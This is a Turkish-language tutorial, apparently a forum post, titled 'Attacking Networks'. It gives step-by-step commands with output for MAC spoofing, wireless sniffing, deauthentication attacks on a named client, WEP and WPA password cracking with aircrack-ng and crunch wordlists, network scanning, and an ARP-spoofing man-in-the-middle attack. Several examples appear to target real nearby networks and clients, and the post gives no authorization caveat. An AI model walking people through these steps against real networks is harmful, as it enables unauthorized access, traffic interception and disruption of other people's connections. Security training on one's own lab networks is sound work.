Ağlara Saldırmak
Merhabalar Ben @bypatnos Lojistik grup adına paylaşılan Ağlara Saldırmak makalesinde sizi görmekten mutluyum.
Dökümanımızın bu bölümünde bolca wlan0 argümanını göreceğiz. Ağ arayüzümüzü temsil eder. Benim cihazımda wlan0 olarak gözüktüğü için argüman olarak wlan0 gönderiyorum. Döküman boyunca wlan0 gördüğümüz yerlerin argüman olduğunu ve kendinize ait işlem yapmak istediğiniz ağ arayüzünüzü kullanmanız gerektiğini lütfen unutmayın.
- Ağ arayüzlerimizi listelemek ve öğrenmek için ifconfig komutunu kullanabiliriz.
- Sadece wireless arayüzlerimizi listelemek için ise iwconfig wlan0 komutunu kullanabiliriz. Yine kendinize ait ağ arayüzünü argüman olarak göndermeniz gerektiğini lütfen unutmayınız.

Saldırı Öncesi Ayarlar
MAC Adresi Değiştirmek
Cihazlar birbirleriyle iletişim kurarken MAC adresleri üzerinden iletişim kurarlar. Fakat bunu sistemsel olarak değiştirebiliriz.- ifconfig wlan0 down ağ arayüzümüzü düşürüyoruz, servis dışı bırakıyoruz.
- macchanger wlan0 --random komutu ile ilgili ağ arayüzümüzün MAC adresini değiştiriyoruz. Çıktıdan da görüleceği üzere MAC adresi başarılı bir şekilde değişmiş oldu.
- ifconfig wlan0 up komutu ile tekrar ağ arayüzümüzü aktif hale getiriyoruz.
Kod:
# ifconfig wlan0 down
# macchanger wlan0 --random
>>> Current MAC: 2a:f9:66:3e:94:53 (unknown)
Permanent MAC: 4c:bb:58:42:c3:89 (unknown)
New MAC: 82:b3:a4:1e:dd:08 (unknown)
# ifconfig wlan0 up
# ifconfig
>>> wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.1.105 netmask 255.255.255.0 broadcast 192.168.1.255
ether 82:b3:a4:1e:dd:08 txqueuelen 1000 (Ethernet)
RX packets 11961 bytes 1369251 (1.3 MiB)
RX errors 0 dropped 2 overruns 0 frame 0
TX packets 1262 bytes 228105 (222.7 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
Monitor ve Managed Mod
Ufak bir not: wlan0 ve wlan0mon argümanlarının cihazdan cihaza değişebileceğini lütfen unutmayınMonitor Mode: herhangi bir ağa bağlanmadan pasif olarak ilgili ağdaki tüm trafiği izlememize olanak sağlayan mod.
Managed Mode: istemcimizin bir ağa bağlanarak hizmet aldığı mod.
Mod Değiştirmek İçin 1. Yöntem (airmon-ng)
- airmon-ng start wlan0 ile monitör mod'a geçebiliriz.
- ifconfig ile veya iwconfig wlan0mon ile monitör mod'a geçip geçmediğimize bakabiliriz.
- airmon-ng stop wlan0mon ile geri managed mod'a geçebiliriz.
Kod:
# airmon-ng start wlan0
>>> Found 2 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode
PID Name
909 wpa_supplicant
16148 NetworkManager
PHY Interface Driver Chipset
phy0 wlan0 ath9k Qualcomm Atheros QCA9565 / AR9565 Wireless Network Adapter (rev 01)
(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
(mac80211 station mode vif disabled for [phy0]wlan0)
# iwconfig wlan0mon
>>> wlan0mon IEEE 802.11 Mode:Monitor Frequency:2.462 GHz Tx-Power=16 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:off
# airmon-ng stop wlan0mon
>>> PHY Interface Driver Chipset
phy0 wlan0mon ath9k Qualcomm Atheros QCA9565 / AR9565 Wireless Network Adapter (rev 01)
(mac80211 station mode vif enabled on [phy0]wlan0)
(mac80211 monitor mode vif disabled for [phy0]wlan0mon)
Mod Değiştirmek İçin 2. Yöntem (iwconfig)
- ifconfig wlan0 down komutu ile ilgili ağ arayüzümüzü servis dışı bırakırız
- iwconfig wlan0 mode monitor ilgili ağ arayüzümüzü monitor moda geçiririz
- ifconfig wlan0 up ilgili ağ arayüzümüzü tekrar devreye sokarız
- iwconfig wlan0 ile ilgili ağ arayüzümüzün modunu kontrol edebiliriz
Kod:
# ifconfig wlan0 down
# iwconfig wlan0 mode monitor
# ifconfig wlan0 up
# iwconfig wlan0
>>> wlan0 IEEE 802.11 Mode:Monitor Frequency:2.462 GHz Tx-Power=16 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:off
- Geri çevirmek istersek ise aynı komutları managed mode için yapıyoruz.
- ifconfig wlan0 down komutu ile ilgili ağ arayüzümüzü servis dışı bırakırız
- iwconfig wlan0 mode managed ilgili ağ arayüzümüzü managed moda geçiririz
- ifconfig wlan0 up ilgili ağ arayüzümüzü tekrar devreye sokarız
- iwconfig wlan0 ile ilgili ağ arayüzümüzün modunu kontrol edebiliriz
Kod:
# ifconfig wlan0 down
# iwconfig wlan0 mode managed
# ifconfig wlan0 up
# iwconfig wlan0
>>> wlan0 IEEE 802.11 ESSID:"SUPERONLINE_WiFi_9547"
Mode:Managed Frequency:2.462 GHz Access Point: 64:6D:6C:65:03:82
Bit Rate=39 Mb/s Tx-Power=16 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=24/70 Signal level=-86 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:1 Invalid misc:2 Missed beacon:0
Ağlarla İlgili Bilgi Toplamak
Ağları İncelemek (Sniffing)
Networkler üzerindeki trafikleri izlemeye verilen isim sniffing'dir.- Öncelikle eğer monitör modda değilsek airmon-ng start wlan0 ile monitör moda geçebiliriz.
- Teyit etmek için bir üst başlıktan bildiğimiz iwconfig wlan0mon komutunu kullanabiliriz.
- Sniffing yapmak için airodump-ng wlan0mon komutunu kullanabiliriz. Bu sayede etrafımızdaki ağları ve onlarla ilgili bilgileri görebiliriz. ctrl + c kombinasyonu ile çıkış yapabiliriz.
Kod:
# airmon-ng start wlan0
# airodump-ng wlan0mon
airodump-ng sonucu gelen veriler ne anlama gelmektedir?- BSSID -> MAC Adresi
- PWR -> Power, ağların bize uzaklığıdır. Absolute olarak küçüldükçe bize yaklaşmaktadır. Yani -84 olarak gözüken ilk ağ -85 olana göre daha yakındadır
- Beacons -> Sinyaller
- #Data -> Elimizde olan, kullanabileceğimiz datalar
- CH -> Channel, veri alış-verişi hangi kanaldan yapılıyor onu göstermektedir
- ENC -> Encryption, ağın nasıl şifrelendiğini göstermektedir. WPA2 diğerlerine göre daha güvenlidir
- CIPHER -> Decrypt modeli
- ESSID -> Ağın adıdır
Belirli Bir Ağa Özel Bilgi Edinmek
Temel olarak yapı şu şekildedir: airodump-ng --channel <channel> --bssid <bssid> --write <file-name> <interface>- # airodump-ng --channel 11 --bssid 64:6D:6C:65:03:82 --write deneme.txt wlan0mon komutu ile tek bir bssid'e ait trafiği izlemeye başladık. Ve bize bu ağa bağlı cihazların MAC adresleri (STATION) vb. kritik bilgileri verecektir. --write argümanını geçersek aldığı bilgileri bir dosyaya yazacaktır.
Kod:
# airodump-ng --channel 11 --bssid 64:6D:6C:65:03:82 --write deneme.txt wlan0mon

Ağa özel bilgi edindikten sonra gelen veriler bir önceki başlığa ek olarak;
- Frames -> Paket alış-verişindeki paketlerin sayısını verir.
- Bu ekrandaki çıktıdan daha detaylı olan bilgi --write argümanı ile yazılan .cap uzantılı dosya içerisinde bulunur.
Deauth Saldırısı
Deauth saldırısı kısaca hedef cihaz ile host arasındaki iletişimi keserek (deauthentication paketleri göndererek) hedefi ağdan düşürme saldırısıdır. Bunu da aireplay aracını kullanarak yapacağız.Deauth Paketi Nedir?
Bir client (istemci/biz) bağlı olduğu kablosuz ağ ile olan bağlantısını koparmak istediğinde aslında istemci, kablosuz ağa bir deauthentication paketi gönderir ve bağlantıyı sonlandırır. Biz de bu saldırıda başkalarının (hedef) adına modemlere (kaynak) deauthentication paketleri göndereceğiz ve hedefleri ağdan düşüreceğiz.
Temel komut dizimi şu şekildedir: aireplay-ng --deauth <packets> -a <kaynak_mac> -c <hedef_mac> <interface>
Bu saldırıda mantık şu şekilde işlemektedir; kaynak, düşürmeye çalıştığımız hedefe: 'ben senden ayrılacağım' diyor, hedef de kaynağa diyor ki: 'ben senden ayrılacağım'. Aslında ikisi de birbirlerine bir şey demiyor. Biz kendilerinin yerlerine geçip yine kendilerine bir şeyler söylüyoruz gibi düşünebiliriz.
- aireplay-ng --deauth 10000 -a 64:6D:6C:65:03:82 -c 0E:80:62:12:28:0D wlan0mon komutu ile kaynak MAC ve hedef MAC'e deauth paketleri (10000 adet) yolluyoruz.
- Eğer kısa süreli ağdan düşsün ve geri bağlansın istersek 5 10 adet paket yollayabiliriz.

Ağlara Saldırmak
Ufak Bir Not:Bu bölümdeki işlemleri yaparken ağ arayüzümüzün monitör modda olduğundan emin olalım. Aynı zamanda wlan0 ve wlon0mon argümanlarının kendi ağ arayüzlerinizi temsil ettiğinden lütfen emin olun.
Encryption (Şifreleme Modelleri)
- WEP (Wired Equivalent Privacy)
- Authentication (Kimlik doğrulama) yoktur.
- Kırılması WPA'ye göre daha kolaydır.
- WPA (Wi-Fi Protected Access)
- TKIP,Wpa şifreleme için kabul edildi. Wep’te değişmeyen 64bit ve 128bit şifreleme anahtarı kullanılmıştır.
- TKIP her paket için dinamik olarak yeni bir 128bit anahtar üretir ve bu yönüyle wep’teki zaafiyetlerin önüne geçti.
- Wpa’nın saldırganlara yönelik attığı adım ile saldırganın veri paketlerini değiştirmesini ve değiştirdiği paketlerin gönderilmesini önlemek için tasarlanmış bir ileti bütünlüğü kontrolü(Message Integrity Check) sağlamaktadır.
- WPA2 (Wi-Fi Protected Access)
- Şuan hala kullanımımız da bulunan en güvenilir kablosuz ağ şifrelemesidir.
- TKIP’den, hem gizlilik hem de bütünlük açısından korunmasında önemli ölçü de güçlüdür.
- Aes güçlü güvenlik tabanlı şifreleme içerdiği için 2004’te sertifikası başladı ve 2006 dan itibaren tüm yeni cihazlarda WPA2 sertifikası zorunlu kılındı.
WEP
WEP Cracking
WEP cracking yaparken adım adım şu yolları izleyeceğiz:- Etraftaki ağları izleyip WEP şifrelemesine sahip bir hedef ağ belirleyeceğiz -> airodump-ng wlan0mon
- Hedef ağa karşı sniffing yapacağız. Ardından ele geçirdiğimiz bilgileri dosyaya yazacağız -> airodump-ng --channel <channel> --bssid <bssid> --write <file-name> <interface>
- aircrack-ng sayesinde verileri decrypt ederek şifreyi kırmaya çalışacağız. -> aircrack-ng <filename.cap> Unutmamalız ki bu işlem paket alış-verişi yapılırken gerçekleşecektir. Bu sebeple bir yandan da airodump-ng ile hedef ağa dair bilgileri toplamaya devam etmeliyiz. 5000 pakette bir deneme yapacaktır ve bulduğu an bize şifreyi verecektir.
- Dönen şifre içerisinden : işaretlerini kaldırmalıyız
Fake Auth (Sahte Yetkilendirme)
WEP Cracking yaparken ağ üzerindeki paketleri izlediğimizi söylemiştik. Peki ya hiç paket alış-verişi yoksa ne yapacağız? Kendimizi ağa tanıtıp bizi dinlemesini sağlayabiliriz. Tam bu noktada Fake Auth saldırısı ile kendimizi sahte olarak yetkilendirebilir ve hedef ağa paket enjekte edebiliriz.Temel komut dizilimi şu şekildedir -> aireplay-ng --fakeauth 0 -a <hedef_mac> -h <kendi_mac_adresimiz> <ag_arayuzu/interface>
Bu komuttan sonra tekrar hedef ağa airodump-ng ile sniffing yaparsak kendi MAC adresimizi de ağa bağlı cihazlar listesinde görebiliriz. Fakat sadece ağa kendimizi tanıtmış olduk, bu ağı şu an kullanamayız.
Package Injection (Paket Enjeksiyonu)
Hedef ağ üzerinde paket alış-verişi yaparak veri akışını sağlarız- Önce hedef ağa Fake Auth ile kendimizi tanıtırız/yetkilendiririz
- Temel komut dizilimi şu şekildedir -> aireplay-ng --arpreplay -b <hedef_mac> -h <kendi_mac_adresimiz> <ag_arayuzu/interface>
- Bu komuttan sonra hedef ağ üzerinde çok sayıda paket alış-verişi yapılmaya başlanır. Ardından airodump-ng ile izlediğimiz ağdan elde ettiğimiz verileri yazdığımız dosyayı aircrack-ng ile decrypt ederek şifreyi bulmaya çalışırız
WPA
Öncelikle Handshake yakalamaya çalışacağız. İçinde muhtemel şifrelerin olduğu bir Wordlist hazırlayacağız ve oluşturduğumuz Handshake'e karşı şifreleri deneyeceğizHandshake Yakalamak
airodump-ng Handshake'i yeni bir kişi ağa bağlanınca yakalayabilir. 2 şey yapabiliriz.- 1-) Bekleriz ki yeni birisi ağa bağlansın
- 2-) Mevcut ağa bağlı birini Deauth Saldırısı ile ağdan düşürürüz ve yeniden bağlanmasını sağlarız. Yakalanan Handshake sağ üstte gözükecektir (airodump-ng ile hedef ağı izlerken). Yakaladığımız Handshake yazdığımız dosya içerisinde vardır ve oluşturduğumuz Wordlist'i bu Handshake'e karşı deneyebiliriz
Wordlist Oluşturmak
Wordlist oluşturmak için CRUNCH adı verilen tool'u kullanabiliriz.Temel komut dizimi şu şekildedir -> crunch <min> <max> <char> -t <pattern> -o <dosya_adi>
Kod:
# crunch 8 9 xyz123 -o testwordlist
>>> Crunch will now generate the following amount of data: 115893504 bytes
110 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 11757312
crunch: 100% completed generating output
# cat testwordlist
>>> xxzxx2z3
xxzxx21x
xxzxx21y
xxzxx21z
xxzxx211
xxzxx212
xxzxx213
xxzxx22x
xxzxx22y
.
.
.
.
Handshake'e Karşı Wordlist Kullanmak
Oluşturduğumuz Wordlist'i yakaladığımız Handshake'e karşı kullanacağız.Temel komut dizimi şu şekildedir -> aircrack-ng <yakaladigimiz_handshake_bulunan_dosya.cap> -w <word_list_dosyamiz>
Kod:
# aircrack-ng deneme-01.cap -w testwordlist
Bağlantı Sonrası Yapılacaklar
Bu bölümde yapılan uygulamalar ve çalıştırılan komutlar 2 cihazında (biz ve hedef) aynı ağda olduğu varsayılarak yapılmıştır. Hedef olarak Virtualbox üzerinde Windows10 işletim sistemi kurdum ve Network modunu Bridge olarak ayarladım.Aynı zamanda bu bölümde yazdığım:
- 192.168.1.218 -> hedef cihazımın IP adresi
- 192.168.1.87 -> benim cihazımın IP adresi
- 192.168.1.0/24 -> yine bana ait IP taraması yaparken kullanacağım adres. Eğer ki siz hedef bilgisayarınızı ve kali cihazınızı sanal makina üzerinden çalıştırıyorsanız Nat Mod'da çalıştırmanız durumunda IP adresleri 10.0.1.0/24 ve 10.0.1.12 vb. şekilde değişebilecektir
Adreslere değil komutlara, tool'lara ve çalışma mantıklarına odaklanmakta fayda var 
Bağlandığımız Ağları İncelemek
Netdiscover
Mevcut bağlı olduğumuz ağ üzerindeki IP adreslerini taramamızı sağlayan tool'dur. Temel komut dizimi şu şekildedir -> netdiscover -i <interface> -r <range>- netdiscover -i wlan0 -r 192.168.1.0/24 -> 0/24 sonu 0-24 arasındakiler demek değildir. Şimdilik tüm IP adresleri olarak bilsek yeterlidir.
Kod:
# netdiscover -i wlan0 -r 192.168.1.0/24 // -i argümanını yollamak zorunda değiliz
>>> Currently scanning: Finished! | Screen View: Unique Hosts
15 Captured ARP Req/Rep packets, from 7 hosts. Total size: 864
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.1.1 64:6d:6c:65:03:79 6 360 HUAWEI TECHNOLOGIES CO.,LTD
192.168.1.20 6c:ef:c6:6b:81:1e 3 180 SHENZHEN TWOWING TECHNOLOGIES CO.,LTD.
192.168.1.46 64:76:ba:b5:1b:dc 1 60 Apple, Inc.
192.168.1.21 0e:80:62:12:28:0c 1 60 Unknown vendor
192.168.1.218 08:00:27:e6:e5:59 2 84 PCS Systemtechnik GmbH
192.168.1.36 0e:80:62:eb:2d:50 1 60 Unknown vendor
192.168.1.105 0e:80:62:42:c3:89 1 60 Unknown vendor
Nmap
Nmap aracını da bağlı olduğumuz ağdaki IP adreslerini bulmak için kullanabiliriz. Temel komut dizimi şu şekildedir -> nmap <IP>
Kod:
# nmap 192.168.1.0/24
>>> Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-22 19:44 +03
Nmap scan report for 192.168.1.1
Host is up (0.00031s latency).
Not shown: 995 filtered ports
PORT STATE SERVICE
21/tcp open ftp
53/tcp open domain
80/tcp open http
443/tcp open https
990/tcp open ftps
MAC Address: 64:6D:6C:65:03:79 (Huawei Technologies)
Nmap scan report for 192.168.1.20
Host is up (0.0015s latency).
All 1000 scanned ports on 192.168.1.20 are closed
MAC Address: 6C:EF:C6:6B:81:1E (Shenzhen Twowing Technologies)
Nmap scan report for 192.168.1.21
Host is up (0.0025s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 0E:80:62:12:28:0C (Unknown)
Nmap scan report for 192.168.1.36
Host is up (0.0020s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
62078/tcp open iphone-sync
MAC Address: 88:E9:FE:EB:2D:50 (Apple)
Nmap scan report for 192.168.1.38
Host is up (0.010s latency).
All 1000 scanned ports on 192.168.1.38 are filtered (828) or closed (172)
MAC Address: 0E:80:62:95:DB:42 (Unknown)
Nmap scan report for 192.168.1.218
Host is up (0.00025s latency).
All 1000 scanned ports on 192.168.1.218 are filtered
MAC Address: 08:00:27:E6:E5:59 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.1.87
Host is up (0.0000070s latency).
All 1000 scanned ports on 192.168.1.87 are closed
Nmap scan report for 192.168.1.105
Host is up (0.0000090s latency).
All 1000 scanned ports on 192.168.1.105 are closed
Nmap done: 256 IP addresses (8 hosts up) scanned in 64.19 seconds
Wireshark
Ağları incelemek için kullanılan program. Terminale wireshark yazarak açabiliriz.Man In The Middle (Ortadaki Adam/MITM)
MITM saldırısında olay kısaca şu şekilde işlemektedir;
- Kurban, sunucuya bir istek atar ve sunucu ona cevap verir (klasik bir network trafiği)
- Fakat MITM saldırısında biz Kurban'a: "sunucu benim" diyoruz
Sunucuya da: "kurban benim" diyoruz
Bu sayede Network Trafiği bizim üzerimizden akmaktadır ve gelip giden paketlere müdahale edebiliriz - Daha da kısa olarak: Network trafiğinde client ile host arasına girerek trafikten bilgi alıyoruz
- Bu saldırıyı MAC adresleri üzerinden gerçekleştiriyoruz. Bunun sebebini Üst başlıklarda açıklamıştık

ARP Spoof (ARP Kandırma)
ARP'nin ne olduğunu yine üst başlıklarda açıklamıştık. Bu sistemde bir açık bulunmaktadır. ARP isteği almadan ARP cevabı gönderme hakkımız bulunmaktadır. Bu açığı kullanarak MITM saldırısında bulunacağızTemel komut dizimi şu şekildedir:
- arpspoof -i <interface> -t <target_IP> <sunucu_IP/modem_IP> -> Bu şu anlama gelmektedir: <target_IP>'yi sanki <sunucu_IP/modem_IP>'ymişim gibi kandıracağım
- arpspoof -i <interface> -t <sunucu_IP/modem_IP> <target_IP> -> Bu da şu anlama gelmektedir: <sunucu_IP/modem_IP>'yi sanki <target_IP>'ymişim gibi kandıracağım
- Yani önce hedefe modemmiş gibi, sonra da modeme hedefmiş gibi davranıyoruz.
- Fakat bu kadar yapmamız yetmez. Bu şekilde bırakırsak hedef'in ağı çöker ve İnternet'e giriş yapamaz. Biz kendi kalimiz üzerinde IP yönlendirmesini aktif hale getirmeliyiz.
- Bunun için de echo 1 > /proc/sys/net/ipv4/ip_forward komutunu kullanırız. Bunu Kali'yi her aç-kapa yaptığımızda yapmalıyız
- Yukarıdaki işlemlerin her birinin farklı terminallerde çalışması gerektiğini söylemeye gerek yoktur sanırsam

Kod:
# arpspoof -i eth0 -t 192.168.1.218 192.168.1.1
# arpspoof -i eth0 -t 192.168.1.1 192.168.1.218
# echo 1 > /proc/sys/net/ipv4/ip_forward
LOJİSTİK TİM SUNDU
Son düzenleme:



